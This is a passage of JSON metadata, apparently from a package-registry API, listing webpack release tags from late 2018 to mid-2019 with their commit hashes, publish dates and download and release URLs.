ha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":